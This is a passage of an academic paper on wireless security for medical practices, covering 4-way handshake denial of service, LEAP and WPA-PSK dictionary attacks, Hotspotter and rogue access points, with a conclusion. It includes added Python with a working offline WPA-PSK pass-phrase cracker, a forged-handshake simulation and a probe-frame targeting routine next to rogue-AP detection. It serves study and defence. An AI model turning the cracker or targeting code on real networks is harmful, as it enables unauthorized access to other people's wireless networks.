Although it is stated as being a very secure method of authenticating wireless clients, a denial of service attack against the four-way handshake has been discovered [16]. The researchers examined the finite states of the authentication process and discovered a problem with the handshake process which would allow an attacker to deny clients access to the network. The vulnerability in the protocol would allow an attacker to block the handshake process by inserting one forged message. Although this attack requires precise timing, having to be launched between message 1 and message 3 of the legitimate handshake, it is possible. The authors have suggested a repair to the IEEE 802.11i working group, which is apparently to be implemented.

    5.4.2 EAP weaknesses

    While each of the EAP methods listed previously provides additional security and
    compatibility, they all have potential weaknesses and provide different strengths. The major
    weakness of the password-based methods is that they can be vulnerable to offline dictionary
    attacks if the credential exchange is not protected. The proprietary Cisco lightweight EAP (LEAP)
    is probably the most vulnerable, as its challenge-response exchange is sent in the clear and is
    directly subject to offline dictionary attack. This protocol has an interesting history. It was
    developed by Cisco in response to a research paper by Mishra and Arbaugh suggesting that
    802.1x/EAP was vulnerable to both session hijacking and man-in-the-middle attacks. Cisco
    responded by producing a release which indicated that Cisco EAP (LEAP) would prevent these
    attacks from occurring. Shortly thereafter, Wright discovered a serious flaw in the LEAP protocol
    that left it vulnerable to offline dictionary attacks: an attacker could capture the challenge and
    response, take them away, and test a list of known words against them until the password was
    recovered. The researcher examined the Cisco website and found only one brief note in relation
    to the problem. The author contacted Cisco, who released a security bulletin and asked Wright to
    hold off releasing an attack tool called Asleap that he had developed. After some time, and no
    further notification from Cisco, the Asleap tool was released. Amongst other things, this tool can
    be used to recover weak LEAP passwords. Cisco has since developed the EAP-FAST method,
    which it claims is more secure.


    5.4.3 TKIP Pre-shared key (PSK) weaknesses

    There are two WPA TKIP modes that wireless systems can use: enterprise or consumer. The
    enterprise mode is a per-user authentication protocol built from the combination of the 802.1x
    security framework, an authentication server, TKIP key management and message integrity
    checking (MIC). The consumer mode uses a pass-phrase to generate the encryption key instead
    of the 802.1x process, and was only meant as an interim data encryption method until the full
    version of WPA became available. The aim of the consumer mode was ease of deployment rather
    than strong security. The simplified system used for this mode leaves it open to an offline
    dictionary attack, because the values needed to create and verify a session key are sent over the
    air in the clear. When a pre-shared key (PSK) is used instead of 802.1x, the PSK becomes the
    pairwise master key (PMK) that drives the 4-way handshake that would normally follow an
    802.1x authentication. The PMK is derived from the pass-phrase and the SSID alone, and the
    handshake exposes the MAC addresses, both nonces and a MIC computed from the resulting
    session key, so anyone who captures one handshake can test candidate pass-phrases offline
    without any further interaction with the network. The problem is not with WPA itself, but the
    way the PSK is chosen can create a problem. If the PSK is less than 20 characters in length and
    can be found in a dictionary, it can easily be cracked. The problem is easily solved by using a
    pass-phrase longer than 20 characters made up of random characters; it persists because most
    consumer-level users are unlikely to do this. Tools such as coWPAtty [25] automate the attack
    against a weak pass-phrase.
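    The handshake mechanics described in sections 5.4.1 and 5.4.3 can be made concrete in code.
    The following Python is an added example written for this page, not code from the paper, from
    [16] or from coWPAtty. It implements the 802.11i pass-phrase-to-PMK mapping, the PTK
    derivation and the EAPOL-Key MIC with only the standard library, then uses them to show both
    the forged-message-1 denial of service of section 5.4.1 (a naive supplicant beside the nonce-reuse
    repair) and the offline dictionary attack against a captured PSK handshake. The SSID, MAC
    addresses, nonces, pass-phrases, word list and the "captured" handshake are all constructed here,
    and the EAPOL-Key body is a stand-in for the real frame (a real MIC is computed over the whole
    EAPOL-Key frame with its MIC field zeroed).

```python
"""Added example for this page (not the paper's or coWPAtty's code): WPA/WPA2-PSK
4-way handshake primitives, a forged-Message-1 DoS against a naive supplicant,
and the offline dictionary attack on a captured handshake. All inputs constructed."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i PSK mapping: PBKDF2-HMAC-SHA1(pass-phrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 over min/max of the two MACs and the two nonces; first 16 bytes are the KCK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(5)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol_body: bytes, ccmp: bool = True) -> bytes:
    """EAPOL-Key MIC: HMAC-SHA1-128 for CCMP (descriptor v2), HMAC-MD5 for TKIP (v1)."""
    return hmac.new(kck, eapol_body, hashlib.sha1 if ccmp else hashlib.md5).digest()[:16]


class Supplicant:
    """Client side of the handshake. naive=True models the behaviour attacked in [16]."""

    def __init__(self, pmk, aa, spa, snonce, naive=True):
        self.pmk, self.aa, self.spa, self.snonce, self.naive = pmk, aa, spa, snonce, naive
        self.ptk = None

    def on_message1(self, anonce):
        # Message 1 carries no MIC, so any station can send one. A naive supplicant
        # replaces its PTK with one derived from whatever ANonce arrived last.
        self.ptk = derive_ptk(self.pmk, self.aa, self.spa, anonce, self.snonce)
        return self.snonce  # Message 2 would carry SNonce plus a MIC under this PTK

    def on_message3(self, anonce, body, mic):
        ptk = self.ptk
        if not self.naive:
            # Repair: keep the SNonce and re-derive the PTK from the ANonce that
            # Message 3 itself carries, so a stray Message 1 cannot desynchronise us.
            ptk = derive_ptk(self.pmk, self.aa, self.spa, anonce, self.snonce)
        return hmac.compare_digest(eapol_mic(ptk[:16], body), mic)


def run_handshake(pmk, aa, spa, anonce, snonce, forged_anonce=None, naive=True) -> bool:
    """Authenticator <-> supplicant exchange; True if the legitimate Message 3 is accepted."""
    sup = Supplicant(pmk, aa, spa, snonce, naive)
    sup.on_message1(anonce)                          # legitimate Message 1 (ANonce)
    if forged_anonce is not None:
        sup.on_message1(forged_anonce)               # attacker's forged Message 1, before Message 3
    auth_ptk = derive_ptk(pmk, aa, spa, anonce, snonce)
    body = b"msg3:" + anonce                         # constructed stand-in for the EAPOL-Key body
    return sup.on_message3(anonce, body, eapol_mic(auth_ptk[:16], body))


def capture_handshake(passphrase, ssid, aa, spa, anonce, snonce):
    """Constructed capture: the fields an attacker reads from the air around Message 2."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    body = b"msg2:" + snonce
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "body": body, "mic": eapol_mic(kck, body)}


def crack_psk(cap, wordlist):
    """Offline dictionary attack: every input except the pass-phrase is in the capture."""
    for cand in wordlist:
        kck = derive_ptk(pmk_from_passphrase(cand, cap["ssid"]), cap["aa"], cap["spa"],
                         cap["anonce"], cap["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, cap["body"]), cap["mic"]):
            return cand
    return None


# Constructed test values
SSID = "clinic-wlan"
AA, SPA = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
FORGED = b"\xff" * 32
WORDLIST = ["password", "letmein", "clinic2019", "welcome1"]

if __name__ == "__main__":
    pmk = pmk_from_passphrase("clinic2019", SSID)
    print("normal handshake:", run_handshake(pmk, AA, SPA, ANONCE, SNONCE))
    print("forged msg1, naive:", run_handshake(pmk, AA, SPA, ANONCE, SNONCE, FORGED, naive=True))
    print("forged msg1, repaired:", run_handshake(pmk, AA, SPA, ANONCE, SNONCE, FORGED, naive=False))
    weak = capture_handshake("clinic2019", SSID, AA, SPA, ANONCE, SNONCE)
    strong = capture_handshake("Tq7#vLm9!pR2&zWx4@Kd", SSID, AA, SPA, ANONCE, SNONCE)
    print("weak PSK recovered:", crack_psk(weak, WORDLIST))
    print("strong PSK recovered:", crack_psk(strong, WORDLIST))
```

    The cost of the attack is one PBKDF2 computation (4096 HMAC-SHA1 iterations) per
    candidate, which is why a pass-phrase found in a word list falls quickly while a long random one
    does not: the attacker never has to talk to the access point again after the capture.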

    5.4.4 Hotspotter - Automatic wireless client penetration

    This tool exploits the Windows XP wireless zero configuration (WZC) service in order to
    obtain information about a client. Hotspotter listens passively for probe request frames sent by
    clients looking for their preferred networks, and compares the requested network names to a
    supplied list of common hotspot network names [26]. If a probed network name matches a
    common hotspot name, Hotspotter will act as an access point with that name to allow the client
    to authenticate and associate. Once the client has associated, Hotspotter can be configured to run
    a command, possibly a script to start a DHCP daemon and other scanning against the new victim.
    Once the client is associated to the rogue network, it is possible to interact with it directly and
    to perform actions including port scanning the victim, exploiting Windows-based vulnerabilities,
    deploying malware or spyware, and simulating an otherwise "real" network using faked services
    (a honeynet) and intercepted DNS queries.

    5.5 Rogue Access Points

    One of the biggest dangers faced by users of a wireless network is that of so-called rogue
    access points. These may not necessarily have been placed by an attacker, but possibly by an
    employee who is not familiar with the dangers of wireless networks. Regardless of who placed it,
    such a device is equally dangerous: it creates a portal into the corporate network that bypasses
    the perimeter controls. It is an extremely serious security breach, and is basically the equivalent
    of running a CAT5 cable into your wired network from the car park or anywhere else that has
    radio line of sight to your wireless network. If an attacker can successfully exploit such a device,
    they can potentially have full access to your entire network.

    5.5.1 Airsnarf - A rogue AP setup utility

    The Airsnarf utility effectively allows an attacker with very little knowledge of wireless
    networking or programming to steal data from wireless users. The utility contains the software
    needed to issue a client with an IP address, DNS and gateway information, and allows the
    attacker to serve whatever web page they wish. An attacker only needs to obtain the SSID and
    MAC address of a valid access point to pretend to be a legitimate device. Once this information
    has been gained, a wireless user's device may automatically connect to the rogue device without
    realising that it is not a valid one. Once the user is connected, the attacker is able to collect a
    wide range of information, including user names and passwords. For example, where users are
    forcibly redirected to a login or portal page, the Airsnarf device can emulate that page and
    collect logons and passwords. It is even capable of passing users through to the internet,
    allowing other information to be captured in transit.
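    Both Hotspotter (section 5.4.4) and the rogue access points of section 5.5 are visible in
    802.11 management frames: the probe requests that Hotspotter matches against its hotspot list,
    and the beacons that a rogue or cloned access point must transmit. The following Python is an
    added example written for this page, not Hotspotter's or Airsnarf's code. It contains a minimal
    parser for management frames and uses it twice: to pick out clients probing for well-known
    hotspot names, as Hotspotter does, and, on the defender's side, to flag beacons whose SSID and
    BSSID pair is not on an authorised list. The frames, MAC addresses, SSIDs, the hotspot name
    list and the authorised list are all constructed here.

```python
"""Added example for this page (not Hotspotter's or Airsnarf's code): a minimal
802.11 management-frame parser used to (a) spot clients probing for well-known
hotspot names, as Hotspotter does, and (b) flag beacons from access points that are
not on an authorised list. All frames, MACs, SSIDs and name lists are constructed."""
import struct

PROBE_REQ, PROBE_RESP, BEACON = 4, 5, 8       # management frame subtypes
IE_SSID = 0                                   # information element id for the SSID


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_mgmt_frame(subtype: int, addr1: str, addr2: str, addr3: str, ies: list, seq: int = 0) -> bytes:
    """Constructed frame: FC, duration, three addresses, sequence control, fixed fields, IEs."""
    fc = subtype << 4                          # protocol version 0, type 0 (management)
    hdr = struct.pack("<HH", fc, 0)
    hdr += b"".join(bytes.fromhex(a.replace(":", "")) for a in (addr1, addr2, addr3))
    hdr += struct.pack("<H", seq << 4)
    fixed = struct.pack("<QHH", 0, 100, 0x0411) if subtype in (BEACON, PROBE_RESP) else b""
    body = b"".join(bytes([tag, len(val)]) + val for tag, val in ies)
    return hdr + fixed + body


def parse_mgmt_frame(frame: bytes) -> dict:
    """Return subtype, addresses, SSID and the information elements of a management frame."""
    if len(frame) < 24:
        raise ValueError("frame shorter than a management header")
    fc, = struct.unpack_from("<H", frame, 0)
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0:
        raise ValueError("not a management frame")
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    off = 24
    if subtype in (BEACON, PROBE_RESP):
        off += 12                              # timestamp, beacon interval, capability
    ies = []
    while off + 2 <= len(frame):
        tag, ln = frame[off], frame[off + 1]
        if off + 2 + ln > len(frame):
            raise ValueError("truncated information element")  # malformed IEs are common attack input
        ies.append((tag, frame[off + 2:off + 2 + ln]))
        off += 2 + ln
    ssids = [v.decode("utf-8", "replace") for t, v in ies if t == IE_SSID]
    return {"subtype": subtype, "da": mac_str(addr1), "sa": mac_str(addr2),
            "bssid": mac_str(addr3), "ssid": ssids[0] if ssids else "", "ies": ies}


def hotspot_targets(frames, hotspot_names):
    """Hotspotter logic: clients probing by name for a common hotspot SSID."""
    wanted = {n.lower() for n in hotspot_names}
    hits = []
    for f in frames:
        p = parse_mgmt_frame(f)
        if p["subtype"] == PROBE_REQ and p["ssid"] and p["ssid"].lower() in wanted:
            hits.append((p["sa"], p["ssid"]))  # a rogue AP advertising this SSID will be joined
    return hits


def rogue_aps(frames, authorised):
    """Beacons whose (SSID, BSSID) is not authorised: an evil twin of our SSID, or an unknown AP."""
    ours = {s for s, _ in authorised}
    findings = []
    for f in frames:
        p = parse_mgmt_frame(f)
        if p["subtype"] != BEACON or (p["ssid"], p["bssid"]) in authorised:
            continue
        kind = "evil twin" if p["ssid"] in ours else "unknown AP"
        findings.append((kind, p["ssid"], p["bssid"]))
    return findings


# Constructed sample traffic
BCAST = "ff:ff:ff:ff:ff:ff"
HOTSPOT_NAMES = ["attwifi", "tmobile", "linksys", "Free Public WiFi"]  # stand-in for Hotspotter's list
AUTHORISED = {("clinic-wlan", "00:11:22:33:44:55")}
FRAMES = [
    build_mgmt_frame(PROBE_REQ, BCAST, "aa:bb:cc:00:00:01", BCAST, [(IE_SSID, b"attwifi")]),
    build_mgmt_frame(PROBE_REQ, BCAST, "aa:bb:cc:00:00:02", BCAST, [(IE_SSID, b"clinic-wlan")]),
    build_mgmt_frame(PROBE_REQ, BCAST, "aa:bb:cc:00:00:03", BCAST, [(IE_SSID, b"")]),  # wildcard probe
    build_mgmt_frame(BEACON, BCAST, "00:11:22:33:44:55", "00:11:22:33:44:55", [(IE_SSID, b"clinic-wlan")]),
    build_mgmt_frame(BEACON, BCAST, "de:ad:be:ef:00:01", "de:ad:be:ef:00:01", [(IE_SSID, b"clinic-wlan")]),
    build_mgmt_frame(BEACON, BCAST, "de:ad:be:ef:00:02", "de:ad:be:ef:00:02", [(IE_SSID, b"linksys")]),
]

if __name__ == "__main__":
    print("clients Hotspotter would impersonate a hotspot for:", hotspot_targets(FRAMES, HOTSPOT_NAMES))
    print("rogue access points:", rogue_aps(FRAMES, AUTHORISED))
```

    The detection half is deliberately limited to what the frames themselves reveal. Because
    Airsnarf copies the MAC address of the real access point as well as its SSID, a cloned BSSID
    would pass the authorised-list check above; catching that case needs information the parser does
    not see, such as the channel, signal strength or timing of the beacons compared with the known
    access point.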


    6 CONCLUSION

    There are many features of wireless WANs that provide user authentication and data
    security. These are intended to provide data protection within the carrier's network but do not
    extend to the Internet and beyond. When a VPN is used with these networks, it provides
    end-to-end security for all data sent over the Internet.

    Wireless networks, whilst providing the advantage of mobility and portability, also come
    with a long list of problems. Data security cannot be guaranteed, and neither can availability.
    This situation is not likely to improve in the near future; in fact, it is likely that more
    vulnerabilities will be discovered over time. A high level of knowledge, technical expertise and
    expense is required if a wireless network is to be used safely and securely. Whilst many
    practitioners may have the financial resources to secure their WLAN, finding a skilled person
    with the right knowledge to do the job may be an issue. Future research will examine the use of
    wireless networks in the medical environment, and the knowledge of the risks by those who use
    them. In relation to the title of this paper, are wireless networks and medical information
    systems mutually exclusive? This discussion shows that they are not. However, that is not to say
    that wireless networks are 100% secure, or that they should be used in every circumstance. A
    serious risk assessment needs to be made in any medical practice intending to use wireless
    networks, to determine whether the benefits outweigh the risks. The threats to wireless networks
    are very real, and new vulnerabilities are being discovered frequently. If wireless networks must
    be used, then they must be used with due care.


    7 BIBLIOGRAPHY

    1. www.sirreawireless.com

    2. www.bitpipe.com

    3. www.itpapers.com

    4. www.google.com

    5. Mobile communication by Schilfer

